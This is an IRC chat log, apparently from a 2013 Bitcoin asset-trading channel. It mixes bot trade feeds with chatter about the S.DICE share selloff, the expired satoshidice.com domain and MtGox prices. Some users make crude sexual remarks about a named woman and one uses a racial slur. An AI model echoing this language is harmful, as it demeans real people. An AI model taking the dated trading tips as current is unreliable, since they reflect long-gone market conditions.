better than 89 satoshi dividends Apr 19 00:02:50 890 Apr 19 00:03:04 very little chance of the share price going up though Apr 19 00:04:03 [HAVELOCK] [SDICE] 2 @ 0.25000002 = 0.5 BTC [-] Apr 19 00:04:18 and the every present risk of it getting shut down Apr 19 00:04:21 fuck, I'm puzzled... the loss from the sale would be enough of an incentive to want to stick it out Apr 19 00:04:49 [MPEX] [S.DICE] 100 @ 0.00216014 = 0.216 BTC [-] Apr 19 00:06:16 what about bbet? Apr 19 00:06:19 same situation? Apr 19 00:07:24 less risk of shutting down imo, operators aren't US citizens with completely fuckign retarded politics Apr 19 00:08:19 as far as I can tell there's not a stock worth holding. Apr 19 00:09:31 probably true Apr 19 00:10:03 [HAVELOCK] [KCIM] 1 @ 1.3789999 BTC [+] Apr 19 00:10:27 so... you're saying I should get out while I still have the skin on my back... Apr 19 00:10:44 [BTCTC] [GSDPT] 11 @ 0.003939 = 0.0433 BTC [+] Apr 19 00:10:57 if you don't have much in, it might be a good long term experiment. at least BBET Apr 19 00:11:03 i thought voorhees got out of the US? Apr 19 00:12:13 panama :beach: Apr 19 00:12:29 sure it ain't panama city FL? Apr 19 00:12:45 S.Dice is pretty safe from shutdown then.. Apr 19 00:13:47 how did s.dice just go from .0027 to .0021? it's dropping... Apr 19 00:14:10 little depth Apr 19 00:15:08 which market you looking at? Apr 19 00:15:25 mpex Apr 19 00:16:23 it's just plummeting... this is not good Apr 19 00:17:29 it was a nice thing when the PTs got to sell it on their sites. all the 'brokers' made a killing, leaving us with shit Apr 19 00:17:34 it's the NYSE is regulated Apr 19 00:17:49 it's *why Apr 19 00:17:53 [MPEX] [S.MPOE] 900 @ 0.00071305 = 0.6417 BTC [-] Apr 19 00:18:30 so, s.dice is not really looking like its going to stabilize. it's just going down. Apr 19 00:19:12 deadweasel: he still travels to and from the US, publicly spouting his anti govt bullshit etc Apr 19 00:19:31 still a US citizen Apr 19 00:19:56 not that ny of these are requiremtnts for getting shutdown by the US (ref: kim dotcom) Apr 19 00:20:19 I think people are consolidating their BTC holdings into cold wallets... dumping worthless stock and locking up tight as banks start closing accts.. Apr 19 00:20:34 dub he's really not helping anyone Apr 19 00:21:02 [BTCTC] [ASICMINER-PT] 1 @ 1.2297 BTC [+] Apr 19 00:22:55 soypirate: its possible that the price will recover after a decent div or two Apr 19 00:23:15 [MPEX] [S.DICE] 603 @ 0.00216016 = 1.3026 BTC [+] Apr 19 00:23:17 [MPEX] [S.DICE] 10 @ 0.00216015 = 0.0216 BTC [-] Apr 19 00:23:19 [MPEX] [S.DICE] 387 @ 0.00216015 = 0.836 BTC [-] Apr 19 00:23:51 soypirate: it miht be a small window to dump before voorhees does however Apr 19 00:24:03 [HAVELOCK] [KCIM] 2 @ 1.45 = 2.9 BTC [+] Apr 19 00:24:13 unlikely Apr 19 00:25:15 jeez Apr 19 00:25:23 !t h kcim Apr 19 00:25:24 [HAVELOCK:KCIM] 1D: 1.24980000 / 1.31354736 / 1.45000000 (19 shares, 24.95739978 BTC), 7D: 1.04900000 / 1.17625177 / 1.45000000 (112 shares, 131.74019879 BTC), 30D: 0.99500000 / 1.13419784 / 1.45000000 (289 shares, 327.78317701 BTC) Apr 19 00:27:40 [MPEX] [S.DICE] 1088 @ 0.00216015 = 2.3502 BTC [-] Apr 19 00:27:42 [MPEX] [S.DICE] 1000 @ 0.00216013 = 2.1601 BTC [-] Apr 19 00:27:53 [MPEX] [S.DICE] 3000 @ 0.00216012 = 6.4804 BTC [-] Apr 19 00:27:55 [MPEX] [S.DICE] 1000 @ 0.00216011 = 2.1601 BTC [-] Apr 19 00:27:56 [MPEX] [S.DICE] 1912 @ 0.001201 = 2.2963 BTC [-] Apr 19 00:28:02 [HAVELOCK] [SDICE] 2 @ 0.25000002 = 0.5 BTC [-] Apr 19 00:28:03 [HAVELOCK] [SDICE] 1 @ 0.25000001 BTC [-] Apr 19 00:28:07 [HAVELOCK] [SDICE] 1 @ 0.25 BTC [-] Apr 19 00:28:08 [HAVELOCK] [SDICE] 6 @ 0.245 = 1.47 BTC [-] Apr 19 00:31:50 tiberiusiv: good time to buy! Apr 19 00:32:09 [MPEX] [S.MPOE] 10000 @ 0.00071305 = 7.1305 BTC [-] Apr 19 00:34:03 [HAVELOCK] [VTX] 7 @ 0.36 = 2.52 BTC [-] Apr 19 00:34:04 [HAVELOCK] [VTX] 6 @ 0.351 = 2.106 BTC [-] Apr 19 00:34:04 [HAVELOCK] [VTX] 1 @ 0.35 BTC [-] Apr 19 00:34:06 [HAVELOCK] [VTX] 1 @ 0.35 BTC [-] Apr 19 00:34:07 [HAVELOCK] [VTX] 1 @ 0.35 BTC [-] Apr 19 00:37:04 [MPEX] [S.DICE] 88 @ 0.001201 = 0.1057 BTC [-] Apr 19 00:41:49 [BTCTC] [GSDPT] 110 @ 0.003938 = 0.4332 BTC [-] Apr 19 00:41:52 [MPEX] [S.MPOE] 4850 @ 0.0007075 = 3.4314 BTC [-] Apr 19 00:41:54 [MPEX] [S.MPOE] 1500 @ 0.00070505 = 1.0576 BTC [-] Apr 19 00:42:42 it remains a challenge to recoup the sign-up fees at mpex. Apr 19 00:43:49 [BTCTC] [S.MPOE-PT] 1 @ 0.000699 BTC [+] Apr 19 00:45:04 ;;ticker Apr 19 00:45:04 BTCUSD ticker | Best bid: 100.50000, Best ask: 100.73567, Bid-ask spread: 0.23567, Last trade: 100.73567, 24 hour volume: 134360.83858928, 24 hour low: 86.00000, 24 hour high: 100.69000, 24 hour vwap: 93.52243 Apr 19 00:45:14 soypirate, for 10 btc investment you can start with coinbr Apr 19 00:46:00 what are the dividends like comparatively? Apr 19 00:46:46 soypirate what do you mean? Apr 19 00:48:05 ok, sorry. I need to look into it a bit more... Apr 19 00:50:02 I just want to find a setup where I can more-or-less "set it and forget it" you know what I mean? How do I evenly distribute the risk between stocks and bonds to get a decent, regular payout... Apr 19 00:50:55 sry, no such thing in btc yet. Apr 19 00:51:37 hehe.. yeah, that's what I see Apr 19 00:51:56 managed investment like btc-bond is close, but still it depends on only one man Apr 19 00:53:13 only mpex seems to have a team and plans for any opportunity Apr 19 00:55:15 s,dice is more people too afaik... but as you can see it's clouded in fud "gonna be closed by usg" Apr 19 00:55:39 I see Apr 19 00:56:44 ;;seen namworld Apr 19 00:56:46 namworld was last seen in #bitcoin-assets 14 hours, 5 minutes, and 16 seconds ago: gox make make the price go down. What's the use for LTC? More trading occuring, maybe not only upward. Apr 19 00:56:47 [05:50:01] I just want to find a setup where I can more-or-less "set it and forget it" you know what I mean? How do I evenly distribute the risk between stocks and bonds to get a decent, regular payout... Apr 19 00:57:02 [HAVELOCK] [VTX] 1 @ 0.35 BTC [-] Apr 19 00:57:04 [HAVELOCK] [VTX] 2 @ 0.33 = 0.66 BTC [-] Apr 19 00:57:05 [HAVELOCK] [VTX] 1 @ 0.31222222 BTC [-] Apr 19 00:57:06 [HAVELOCK] [VTX] 20 @ 0.31111 = 6.2222 BTC [-] Apr 19 00:57:06 [HAVELOCK] [VTX] 3 @ 0.3111 = 0.9333 BTC [-] Apr 19 00:57:07 [HAVELOCK] [VTX] 2 @ 0.31 = 0.62 BTC [-] Apr 19 00:57:14 https://coinbr.com/ref?c=294TNRz1oP soypirate you can trade on Coinbr pretty easily. Apr 19 00:57:19 soypirate: get an account at Vanguard, split 60% Vanguard Total Stock Market Mutual Fund, 40% Vanguard Total Bond Market Mutual Fund Apr 19 00:57:23 only 3 stocks there. the only 3 worth buying. Apr 19 00:57:48 sounds like he is already mpex direct Apr 19 00:57:54 lol Apr 19 00:58:04 soypirate: you need to put in at least $5k in both (=$10k) to invest in the mutual fund form, but there is no minimum for the ETF form of it Apr 19 00:59:00 diablo-d3 - you have been paid - I will pm you my info on the forum Apr 19 00:59:13 jborkl: ahem, you typoed. Apr 19 00:59:17 I see, thank you Apr 19 00:59:27 jborkl: you sent 54.37 not 84.37 Apr 19 00:59:39 I sent 2 transactions Apr 19 00:59:46 oh, havent seen the second one yet Apr 19 00:59:48 one for 30 and one for 54.37 Apr 19 01:00:09 the first is coming from btctc.. the 30 Apr 19 01:00:33 so they have to do the withdraw - not automatic Apr 19 01:04:53 out of 16. Apr 19 01:06:03 [MPEX] [S.MPOE] 6734 @ 0.00071305 = 4.8017 BTC [+] Apr 19 01:06:05 [MPEX] [S.MPOE] 7650 @ 0.00073264 = 5.6047 BTC [+] Apr 19 01:06:39 hey all Apr 19 01:08:58 aloha Apr 19 01:10:51 [MPEX] [S.MPOE] 13016 @ 0.00073287 = 9.539 BTC [+] Apr 19 01:10:58 hi Apr 19 01:12:07 ;;ticker --last Apr 19 01:12:08 102.80000 Apr 19 01:12:11 :| Apr 19 01:12:54 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Apr 19 01:12:55 jesus. Apr 19 01:13:57 ;;bids 0 Apr 19 01:13:57 There are currently 99189589 bitcoins demanded at or over 0.0 USD, worth 20727724.3897 USD in total. | Data vintage: 54.1620 seconds Apr 19 01:14:32 [MPEX] [S.MPOE] 900 @ 0.00073437 = 0.6609 BTC [+] Apr 19 01:14:34 [MPEX] [S.MPOE] 800 @ 0.00073438 = 0.5875 BTC [+] Apr 19 01:14:51 kakobrekla: My new favorite plot. http://blockchained.com/depth_mtgox_15d.png Apr 19 01:15:00 fuckin hell Apr 19 01:15:04 i forgot my yubikey at home Apr 19 01:15:05 That's a nice tidal wave of bids Apr 19 01:15:09 FUCK. Apr 19 01:15:16 u want to buy or sell? Apr 19 01:15:31 I think he wants to buy. Apr 19 01:15:32 shot myself really Apr 19 01:15:32 google authenticator brah Apr 19 01:15:34 That is why I use 2fa and a yubikey Apr 19 01:15:46 What if he forgets his phone? Apr 19 01:16:04 well, i can just watch until sun/mon :( Apr 19 01:16:04 what if he forgets his key Apr 19 01:16:15 that sucks Apr 19 01:16:26 can someone read it to you over the phone? Apr 19 01:16:33 But on sun/mon it might be 120+? Apr 19 01:16:45 or 80 or 280 or 28 Apr 19 01:16:51 has to plugged into usb where you can touch it Apr 19 01:16:51 im not in panic buy mode yet Apr 19 01:17:03 50% retracement is at 160. Apr 19 01:17:09 hehe, ver true kakobrekla Apr 19 01:17:09 ah ok. Apr 19 01:17:12 [BTCTC] [RSM] 6 @ 0.003999 = 0.024 BTC [+] Apr 19 01:17:22 well I'd let my sister or someone do it for me Apr 19 01:17:28 family at least Apr 19 01:17:31 noone that can do that Apr 19 01:17:31 that blows Apr 19 01:18:01 blah Apr 19 01:18:07 my own fault Apr 19 01:18:21 yubikey to trade or transfer? Apr 19 01:18:50 trade Apr 19 01:19:08 if calls were not a million dollars I'd do that Apr 19 01:19:18 then create virgin account and transfer to it Apr 19 01:19:37 cant trasnfer dollars :) Apr 19 01:19:44 transfer* Apr 19 01:19:52 such a weak currecny! Apr 19 01:20:08 right... gox codes gone.... Apr 19 01:20:51 not for euros right? could buy on OTC using a t+3 type thing, think you are trustworthy enough Apr 19 01:21:05 t+3? Apr 19 01:21:22 time + 3 days? Apr 19 01:21:24 settle trade on mon Apr 19 01:21:26 yes Apr 19 01:21:39 hmm Apr 19 01:21:45 i guess that is the last resort Apr 19 01:22:04 FUCK Apr 19 01:22:07 put in a bid instead of an ask Apr 19 01:22:10 can offer gox euro code right? Apr 19 01:22:12 fucking gox'd again Apr 19 01:22:15 this is going to bubble again or something Apr 19 01:22:22 or not Apr 19 01:22:28 or not Apr 19 01:22:30 Please, no more bubbling Apr 19 01:22:33 or not not Apr 19 01:22:49 But if it does... I got 100 more BTC going into MtGox right now. Apr 19 01:22:53 its still in bounce mode Apr 19 01:23:02 kinda strong bounce Apr 19 01:23:08 well Apr 19 01:23:12 look at the last bubble Apr 19 01:23:19 strong bounces too... Apr 19 01:23:35 ok people Apr 19 01:23:40 although Apr 19 01:23:42 here is a yes no question for you all Apr 19 01:23:47 I buses we already had that bounce Apr 19 01:23:49 is bitcoin worth more than 100$? yes or no Apr 19 01:23:52 right now Apr 19 01:23:55 yes Apr 19 01:23:56 ;;eightball 100+ or no Apr 19 01:23:57 You're kidding, right? Apr 19 01:23:57 not in years to come Apr 19 01:24:03 well Apr 19 01:24:22 most of the price is due to expectation of future growth of the currency Apr 19 01:24:28 id say no, it goes up to quickly again ... Apr 19 01:24:30 too* Apr 19 01:24:34 like any small cap or biotech Apr 19 01:24:45 I like $100, it's easy to do math with that Apr 19 01:24:46 it's not really small cap anymore Apr 19 01:24:48 i know its yes because i just sold some for 100 :P Apr 19 01:25:08 upper small cap maybe Apr 19 01:25:14 My take on the thing: http://i.imgur.com/XhAY8Zl.png Apr 19 01:25:17 fuck i said YES or NO and i got a load of not 'yes' and not 'no' text? Apr 19 01:25:19 i mean it's gotten a shit ton of attention Apr 19 01:25:33 2nd bubble of many bubbles to come for BTC Apr 19 01:25:44 Hopefuly it will survive the crashes Apr 19 01:25:59 the more bubbles the better :D Apr 19 01:26:13 for traders at least Apr 19 01:26:37 [MPEX] [S.DICE] 200 @ 0.0012 = 0.24 BTC [-] Apr 19 01:27:44 NO Apr 19 01:28:01 why not Apr 19 01:28:10 unless you consider growth prospects Apr 19 01:28:23 of course it wont be good for the confidence Apr 19 01:29:18 hash power is not supporting this price yet Apr 19 01:29:51 how so Apr 19 01:30:11 i use this to meause it http://smpake.com/etc/btc/ Apr 19 01:30:21 measure Apr 19 01:30:22 [BTCTC] [S.BBET-PT] 1 @ 0.00199 BTC [+] Apr 19 01:31:50 i see Apr 19 01:32:06 so in terms of mining revenue this last bubble was small compared to 2011 Apr 19 01:32:22 [MPEX] [S.MPOE] 9500 @ 0.00070505 = 6.698 BTC [-] Apr 19 01:33:18 [MPEX] [S.DICE] 2500 @ 0.00361221 = 9.0305 BTC [+] Apr 19 01:33:20 [MPEX] [S.DICE] 387 @ 0.00371221 = 1.4366 BTC [+] Apr 19 01:34:18 yes Apr 19 01:34:21 4 times smaller Apr 19 01:34:30 there about Apr 19 01:34:42 hey guys Apr 19 01:34:49 how much did avalon's latest batch sell for Apr 19 01:35:03 [HAVELOCK] [VTX] 3 @ 0.311 = 0.933 BTC [+] Apr 19 01:35:16 Namworld, one week after 2011 crash, Mgox was hacked ! Apr 19 01:35:51 Was like 88 btc to start Apr 19 01:36:03 they sold per module I think a 4 module was more, I dont remember exactly Apr 19 01:36:20 man, wtf is with the asicminer bidding then Apr 19 01:36:35 yeah… the gox hack was a big deal Apr 19 01:36:43 I forgot about that in my initial analysis Apr 19 01:36:50 Apr 19 01:37:42 ;;bc,stats Apr 19 01:37:45 Current Blocks: 232033 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1822 blocks | Next Difficulty In About: 1 week, 4 days, 11 hours, 1 minute, and 7 seconds | Next Difficulty Estimate: 9878659.93315 | Estimated Percent Change: 10.07727 Apr 19 01:37:55 That's why people think its a bit ridiculous to pay 70 btc for a 10gh module Apr 19 01:38:06 I think I'll bid on one just to own one Apr 19 01:38:19 ;;genrate 10000 Apr 19 01:38:20 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 19 01:38:25 Why not just use the DIY Apr 19 01:38:39 seems more fun and you can build yourself an Avalon Apr 19 01:38:51 ;;calc 70 / 0.560385478255 Apr 19 01:38:51 124.914014935 Apr 19 01:38:58 Get it in July sometime Apr 19 01:38:59 ;;calc 70 / 0.560385478255 / 30 Apr 19 01:38:59 4.16380049783 Apr 19 01:39:06 4 months isn't really that bad Apr 19 01:39:08 maybe haha Apr 19 01:39:21 did you read the DIY stuff? Apr 19 01:39:21 ;;diff Apr 19 01:39:21 8974296.01488785 Apr 19 01:39:34 Doffx: not really interested in that Apr 19 01:39:44 I bought 30 chips and im going to give it a try, seems interesting Apr 19 01:39:52 Ill get like 8.333 GH out of that Apr 19 01:39:58 Thereabouts Apr 19 01:41:22 kakobrekla, what should the current hash rate be supporting? I am not sure I understand how to get that from the graphs Apr 19 01:41:39 if friedcat auctions these every week, I might buy one every week Apr 19 01:42:07 I think they are going to come up with a price and sell units without an auction next Apr 19 01:42:21 i want know how fell the guy with a 5K btc preorder on BFL, he could sold them for 1.25M$ @ 250$/btc Apr 19 01:42:29 Plus they still have those USB units they haven’t said anything new about Apr 19 01:42:34 I skimmed the DIY thread, didn't seem like enough there to build without further engineering Apr 19 01:42:38 id say 0.3 eur Apr 19 01:42:40 so a third less Apr 19 01:42:42 http://satoshidice.com/ domain expired Apr 19 01:42:45 that is 70$ Apr 19 01:42:55 Doffx: ahh. Then what I should do is push bids up. Apr 19 01:43:34 fuck Apr 19 01:43:44 I could bid 64.5 on 7 of them. Apr 19 01:43:47 OK, that makes sense now. Apr 19 01:43:52 Hehe, thick i had a note in my phone to check 1 week before :) Apr 19 01:44:03 Just so you could have the hardware? Apr 19 01:44:12 anyone talk to erik? Apr 19 01:44:15 ehats the deal Apr 19 01:44:17 whats* Apr 19 01:44:25 is not Apr 19 01:44:25 Doffx: well it'll force everyone else to try to outbid me Apr 19 01:44:38 Lol, I am sure they will. Apr 19 01:44:39 well tbh i expect it to get lowe than 0.3 with asic Apr 19 01:44:39 but Apr 19 01:44:39 that might be too late. Apr 19 01:44:47 Doffx: the auction is setting sales prices Apr 19 01:45:08 He didnt say it would exactly match the highest bid Apr 19 01:45:16 no, its implied an average of all 10 Apr 19 01:45:20 or a mean Apr 19 01:45:21 or something Apr 19 01:45:30 lol no one cares that satoshidice.com is gone? Apr 19 01:45:38 hehe no Apr 19 01:45:38 ThickAsThieves: GOOD RIDDANCE Apr 19 01:45:40 PARTY TIME Apr 19 01:45:54 I have no ascii art to describe how I feel :< Apr 19 01:46:03 nobody cares. Apr 19 01:46:06 http://satoshidice.com/ Apr 19 01:46:16 ThickAsThieves wtf? Apr 19 01:46:21 still htere! yet nobody cares still. Apr 19 01:46:23 SD is up for me Apr 19 01:46:26 ThickAsThieves: ICANN is an evil gubbermint oligarchy, Erik refuses to conform and has created his own DNS root Apr 19 01:46:37 i think he means the stock. Apr 19 01:46:53 expired domains can be renewed within a couple days of expiration Apr 19 01:47:08 libertarian is the new emo Apr 19 01:48:02 Lol, well that explains the selloff Apr 19 01:48:30 maybe ! Apr 19 01:49:16 howdy neighbour Apr 19 01:49:36 [18:46] ThickAsThieves wtf? hmm? Apr 19 01:49:46 the SD thingy, nevermind Apr 19 01:49:53 jurov: not a big deal, but I noticed http://mpex.coinbr.com/ is down Apr 19 01:52:13 eh, don't really need the site to play Apr 19 01:52:59 http://blockchain.info/ down for me Apr 19 01:53:35 back Apr 19 01:53:46 The owner of the Domain Name can Apr 19 01:53:46 renew it from within the control panel or approach his service provider for the same. Apr 19 01:53:52 i dont see any sdice bets there though Apr 19 01:54:32 same for me on blockchain Apr 19 01:55:05 [BTCTC] [S.DICE-PT] 3 @ 0.0039 = 0.0117 BTC [-] Apr 19 01:55:15 [BTCTC] [S.DICE-PT] 2 @ 0.0039 = 0.0078 BTC [-] Apr 19 01:55:18 [BTCTC] [S.DICE-PT] 10 @ 0.00381 = 0.0381 BTC [-] Apr 19 01:58:02 btctalk ? nothing ? Apr 19 01:59:03 i think we can assume erik is buys getting waterboarded Apr 19 01:59:08 busy* Apr 19 01:59:09 http://www.whatsmydns.net/#A/satoshidice.com Apr 19 01:59:13 multiple DNS Apr 19 01:59:18 some are spam links Apr 19 01:59:27 IPs* Apr 19 02:00:41 thats probably normal Apr 19 02:01:12 registrar camping on expired domain until the 30 day renewal period is up Apr 19 02:01:28 [BTCTC] [PAJKA.BOND] 1 @ 0.10175 BTC [+] Apr 19 02:01:49 some people still get the site though Apr 19 02:02:11 until it falls out of their cache yes Apr 19 02:02:32 maybe this is the day mpex takes the money and runs Apr 19 02:02:40 I got redirected to a maleware site Apr 19 02:02:48 what has mpex got do to with s.deuce? Apr 19 02:03:00 That was the first time I ever tried to go to SD Apr 19 02:03:01 404 on S.dice could be bad imo Apr 19 02:03:54 But more important, no bet ? Apr 19 02:04:05 I don't see any malware Apr 19 02:05:02 [HAVELOCK] [HIM] 4 @ 1.82 = 7.28 BTC [+] Apr 19 02:05:47 The second time I went to it dub I didn’t get it, was odd. Apr 19 02:06:02 [HAVELOCK] [VTX] 2 @ 0.44889999 = 0.8978 BTC [+] Apr 19 02:06:57 well Im glad, really Apr 19 02:07:02 [HAVELOCK] [SDICE] 9 @ 0.245 = 2.205 BTC [-] Apr 19 02:07:05 it means SD is finally dead Apr 19 02:07:16 sell your stock and run while you can Apr 19 02:08:03 [HAVELOCK] [SDICE] 10 @ 0.23 = 2.3 BTC [-] Apr 19 02:08:04 [HAVELOCK] [SDICE] 1 @ 0.22780632 BTC [-] Apr 19 02:08:05 [HAVELOCK] [SDICE] 2 @ 0.223045 = 0.4461 BTC [-] Apr 19 02:08:07 [HAVELOCK] [SDICE] 8 @ 0.221 = 1.768 BTC [-] Apr 19 02:08:08 [HAVELOCK] [SDICE] 15 @ 0.22 = 3.3 BTC [-] Apr 19 02:08:09 [HAVELOCK] [SDICE] 25 @ 0.214 = 5.35 BTC [-] Apr 19 02:09:03 ah shutup Diablo-D3 Apr 19 02:09:16 PrtSc 4 glory Diablo Apr 19 02:09:42 ugh Apr 19 02:10:03 [HAVELOCK] [SDICE] 6 @ 0.21 = 1.26 BTC [-] Apr 19 02:10:04 [HAVELOCK] [SDICE] 17 @ 0.2 = 3.4 BTC [-] Apr 19 02:10:05 [HAVELOCK] [SDICE] 44 @ 0.181 = 7.964 BTC [-] Apr 19 02:10:14 ... Apr 19 02:10:21 Cmon it was a joke Apr 19 02:10:52 doesnt look like a joke Apr 19 02:11:18 Script are not on front end, maybe a technical issue Apr 19 02:11:50 not the first time, sooooooo some1 skype erik please ? Apr 19 02:12:03 [HAVELOCK] [SDICE] 6 @ 0.181 = 1.086 BTC [-] Apr 19 02:12:55 https://bitcointalk.org/index.php?topic=101902.msg1879460#msg1879460 Apr 19 02:13:59 "I'll try to get out in the high 20s" Maybe not this time Apr 19 02:14:17 SDICE getting no love Apr 19 02:14:39 shame, it's bitcoin factory Apr 19 02:14:42 Namworld: lower divs Apr 19 02:15:03 lol i just doubled down on sdice last week Apr 19 02:15:03 no exit on MPEX... Apr 19 02:16:03 [HAVELOCK] [SDICE] 50 @ 0.18 = 9 BTC [-] Apr 19 02:16:40 ;;seen mircea_popescu Apr 19 02:16:40 mircea_popescu was last seen in #bitcoin-assets 12 hours, 43 minutes, and 34 seconds ago: jurov indeed we aren't. Apr 19 02:17:02 [HAVELOCK] [SDICE] 100 @ 0.165 = 16.5 BTC [-] Apr 19 02:17:16 speaking of Apr 19 02:17:25 the orderbook at havelock is whack Apr 19 02:17:26 we can now debunk another mistery Apr 19 02:17:31 mpoe-pr is real Apr 19 02:17:36 :) Apr 19 02:18:03 [HAVELOCK] [SDICE] 7 @ 0.125 = 0.875 BTC [-] Apr 19 02:18:34 kakobrekla: old news Apr 19 02:18:45 not for the nonbelivers! Apr 19 02:18:47 new news: ebay earnings shock the market Apr 19 02:18:56 kakobrekla: where is the proof? Apr 19 02:18:56 short sell! Apr 19 02:19:10 in the pudding Apr 19 02:19:15 Erik might be on a trip Apr 19 02:19:23 I suspect that is whats up Apr 19 02:19:29 thats correct Apr 19 02:19:33 ;;eightball S.dice is dead ? Apr 19 02:19:33 About as likely as pigs flying. Apr 19 02:19:41 here comes da pudding zip zop bobbity bop Apr 19 02:19:54 :( Apr 19 02:20:05 asciilifeform i shook her hand today, that good enough? Apr 19 02:20:19 i shook a baby today, is that enough? Apr 19 02:20:27 ya but babies do exist Apr 19 02:20:35 we mostly agree on that Apr 19 02:20:38 until you shake them Apr 19 02:20:52 then they are shaked babies? Apr 19 02:20:58 ah, point taken. Apr 19 02:21:03 what the point it Apr 19 02:21:11 are you trying to say MPOE-PR is a real woman? Apr 19 02:21:12 kakobrekla: maybe you also shook Bigfoot's hand Apr 19 02:21:32 indeed it is Apr 19 02:21:32 the one from the pic Apr 19 02:21:37 hehe Apr 19 02:21:58 I shook bigfoot's relatively small johnson after he plowed MPOE-PRs hairy axe wound. Apr 19 02:22:01 Was she cute, or did she have really large hands? Apr 19 02:22:18 it was all I could reach Apr 19 02:22:27 her hands were normal sized lmao Apr 19 02:23:31 hehe Apr 19 02:23:44 but she know has a bigfoot sized vag. Apr 19 02:23:48 now* Apr 19 02:23:55 fuck me I need food. Apr 19 02:24:19 105 wall down Apr 19 02:24:22 ;;ticker --last Apr 19 02:24:23 105.50000 Apr 19 02:24:48 jesus the impudence Apr 19 02:24:48 106 wall going Apr 19 02:24:51 hi ya'all Apr 19 02:24:53 [MPEX] [S.MPOE] 6879 @ 0.00070505 = 4.85 BTC [-] Apr 19 02:24:53 [MPEX] [S.MPOE] 8118 @ 0.00070053 = 5.6869 BTC [-] Apr 19 02:25:30 and now mpoe crashes Apr 19 02:25:40 oh hai Apr 19 02:25:51 RALLY ON WAYNE Apr 19 02:26:11 ;;bids 0 Apr 19 02:26:14 There are currently 99198432 bitcoins demanded at or over 0.0 USD, worth 21659691.5446 USD in total. | Data vintage: 0.0120 seconds Apr 19 02:26:23 sooo buggy p, Apr 19 02:26:25 whats the news Apr 19 02:26:30 price goes up, total bids goes up Apr 19 02:26:38 the news is, I am long from 97 Apr 19 02:26:42 half stack Apr 19 02:26:57 i went in for 200 myself Apr 19 02:27:01 lets get this bitch back to 150 Apr 19 02:27:03 lol Apr 19 02:27:05 so much for my tinfoil hat phase Apr 19 02:27:06 or 130 Apr 19 02:27:24 Bugpowder, mah niggan Apr 19 02:27:31 nigga* Apr 19 02:27:37 thats for clarifying that Apr 19 02:27:40 thanks Apr 19 02:27:41 * Apr 19 02:28:13 O_o Apr 19 02:29:14 is a niggan like a vegetarian black dude ? Apr 19 02:29:28 kakobrekla: why u no forek? Apr 19 02:29:32 forex* Apr 19 02:30:20 ;;ticker Apr 19 02:30:21 BTCUSD ticker | Best bid: 108.50000, Best ask: 108.97000, Bid-ask spread: 0.47000, Last trade: 108.98000, 24 hour volume: 159590.55540562, 24 hour low: 86.00000, 24 hour high: 108.98900, 24 hour vwap: 95.89234 Apr 19 02:31:02 what kind of question is that Apr 19 02:31:13 who me? Apr 19 02:31:48 mp any word abot this sdice website shit? Apr 19 02:32:17 jesus fuck, 110 wall going down fast Apr 19 02:32:43 bitcoin, the gift that keeps on giving Apr 19 02:32:45 jeebus Apr 19 02:32:48 ThickAsThieves mmm Apr 19 02:33:00 what shit is that ? Apr 19 02:35:07 expired domain name Apr 19 02:35:15 bets not being processed Apr 19 02:35:17 etc. Apr 19 02:35:24 i see it ? Apr 19 02:35:45 bad domains havent fully propgated yet Apr 19 02:35:53 odd Apr 19 02:36:17 so like a dns attack or what ? Apr 19 02:36:29 the attack of forgetting to pay for the domain Apr 19 02:36:33 i get satoshidice.com. 19177 IN A 94.142.154.208 Apr 19 02:36:35 well, the domain is def expired Apr 19 02:36:50 most registrars give you a 90 day grace period Apr 19 02:37:09 Expiration Date: 18-Apr-2013 ahahaha idiots Apr 19 02:37:19 lol Apr 19 02:37:26 rally's on! Apr 19 02:37:26 well ya, hopefully tjhey didn't lose the domain. Apr 19 02:37:36 Domain Name: SATOSHIDICE.COM Apr 19 02:37:36 Registration Date: 18-Apr-2012 Apr 19 02:37:36 Expiration Date: 18-Apr-2013 Apr 19 02:37:36 Status:RENEWAL HOLD Apr 19 02:37:47 looks like he can still get it back Apr 19 02:38:22 today is the 18th... Apr 19 02:39:56 it's a shitty domain anyway, get Apr 19 02:40:00 http://.sd Apr 19 02:41:27 fuck Apr 19 02:41:33 ;;ticker Apr 19 02:41:34 BTCUSD ticker | Best bid: 110.00000, Best ask: 110.55000, Bid-ask spread: 0.55000, Last trade: 110.55000, 24 hour volume: 164008.50250337, 24 hour low: 86.00000, 24 hour high: 110.35000, 24 hour vwap: 96.46533 Apr 19 02:44:34 !ticker m s.dice Apr 19 02:44:35 [MPEX:S.DICE] 1D: 0.0012 / 0.00272143 / 0.00371221 (33263 shares, 90.52 BTC), 7D: 0.0012 / 0.00334017 / 0.00439999 (95347 shares, 318.48 BTC), 30D: 0.0012 / 0.00338779 / 0.005598 (1793824 shares, 6,077.10 BTC) Apr 19 02:45:21 its probably just erik wanting to buy back Apr 19 02:45:42 whats the month shaping up like? Apr 19 02:46:17 guys, the domain name http://vagi.na/ is available Apr 19 02:46:23 but it's EUR 3,250.00 Apr 19 02:46:33 somebody buy that :P Apr 19 02:46:50 nobody cares what domain they are fapping to Apr 19 02:46:54 MP every day Apr 19 02:46:59 dub: I do Apr 19 02:49:04 [HAVELOCK] [HIM] 1 @ 1.82 BTC [+] Apr 19 02:50:02 [HAVELOCK] [VTX] 4 @ 0.32 = 1.28 BTC [-] Apr 19 02:50:04 [HAVELOCK] [VTX] 5 @ 0.32 = 1.6 BTC [-] Apr 19 02:50:48 aite well, catch you all tomorrow or something. Apr 19 02:50:57 cya **** BEGIN LOGGING AT Fri Apr 19 11:01:33 2013 Apr 19 11:03:12 http://bitbet.us/bet/429/bitcoin-24-will/ wow that's one Apr 19 11:09:43 mornin Apr 19 11:13:13 breaks through 130. If that holds things just might get all crazy again. Apr 19 11:13:28 ya. right. Apr 19 11:13:33 and i might just shoot somebody. Apr 19 11:13:42 I call bulltrap Apr 19 11:13:50 this is unreal...from 95 ro 135 lol Apr 19 11:13:50 return to normal Apr 19 11:13:54 to* Apr 19 11:14:05 "What a bargain!"ers Apr 19 11:14:25 But the influx of new cash ain't going to support that. Apr 19 11:21:36 this hurts to watch Apr 19 11:21:53 i mustnt think about howmuch i had now if i didn't take multiple targets Apr 19 11:22:09 yeah, no good will come of that. Apr 19 11:25:04 god fuckin dammit - the price. Apr 19 11:25:33 bitcoin is screaming "somebody stop me" the mask style Apr 19 11:25:35 i'd get nervous when we break through 160, until then it's not that dramatic Apr 